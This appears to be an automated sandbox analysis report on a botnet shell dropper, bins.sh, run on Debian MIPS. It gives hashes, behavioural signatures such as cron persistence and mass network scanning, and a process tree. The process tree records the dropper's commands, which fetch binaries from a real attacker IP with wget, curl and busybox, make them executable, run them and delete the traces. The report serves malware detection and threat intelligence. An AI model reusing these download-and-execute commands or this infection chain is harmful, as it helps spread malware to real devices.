Analysis
-
max time kernel
123s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
20-02-2025 18:33
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
1a818bb63a3306ae460a32c139410128
-
SHA1
a25809c8e4858f91c10123448406631554ab739d
-
SHA256
3a6cdf4d9eb0d91dc2125de430207fc449a34acb22787078b19b11df5b42ae32
-
SHA512
3e47969ff983b506139c03ef59f55f7e5983ca8cb590dd0ad4d1c1a62bd6b174ab3aaf1e6f605f07e037b8a7b7f866466ebee7438a93ff86c1b00aeb79997caa
-
SSDEEP
192:fipgN2oT7Udx7DLs5NzO/IT7UdxTDLs5NmA:fqgN20O/A
Malware Config
Signatures
-
Contacts a large (1501) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 735 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo 736 bins.sh -
Renames itself 1 IoCs
pid Process 737 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.8b7hlr crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/997/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1020/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1083/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1150/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/21/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/144/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/853/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/969/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/972/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/976/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/985/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/432/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/706/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/794/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/798/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/882/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/921/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/941/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/949/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/80/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/978/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/983/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1055/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1068/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1095/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1134/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1149/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/799/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/864/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1025/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1031/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1044/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1047/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1053/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1084/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/2/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/70/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1046/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1115/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1117/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1129/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/37/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/920/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/928/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1034/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/77/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/711/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/854/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/855/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/896/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/952/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1102/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1124/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/16/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1023/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1032/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1086/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1087/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/1153/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/820/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/924/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/929/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo File opened for reading /proc/970/cmdline 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo wget File opened for modification /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo curl File opened for modification /tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:703 -
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo2⤵
- Writes file to tmp directory
PID:709
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://37.44.238.88/bins/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo2⤵
- Writes file to tmp directory
PID:734
-
-
/bin/chmodchmod 777 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo./2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo2⤵
- Renames itself
- Reads runtime system information
PID:736 -
/bin/shsh -c "crontab -l"3⤵PID:738
-
/usr/bin/crontabcrontab -l4⤵PID:739
-
-
-
/bin/shsh -c "crontab -"3⤵PID:740
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:741
-
-
-
-
/bin/rmrm 2JrQKH3tcDpoOX6QqonCfyufCSOukGoXDo2⤵PID:752
-
-
/usr/bin/wgetwget http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly2⤵PID:757
-
-
/usr/bin/curlcurl -O http://37.44.238.88/bins/MOCJUczo8nGNpJfrIY0AcgPyu9i8Dikbly2⤵PID:759
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
210B
MD52ba743648f1c5cd1991454d82af4e248
SHA179c9beaccf829629c67e2f3baa6d6565f49b5b13
SHA2561de88490f588fe6e485b31696694cf5ca486809b80213d43e055598ba53ae080
SHA51254b754c410cc01066c045c15c632f4e9a034edab0061f5131ec8e13d44696c030311e8842e36fdbb5b7ef2226317388250f008194b1ed89bdbf0eb2b589b6f51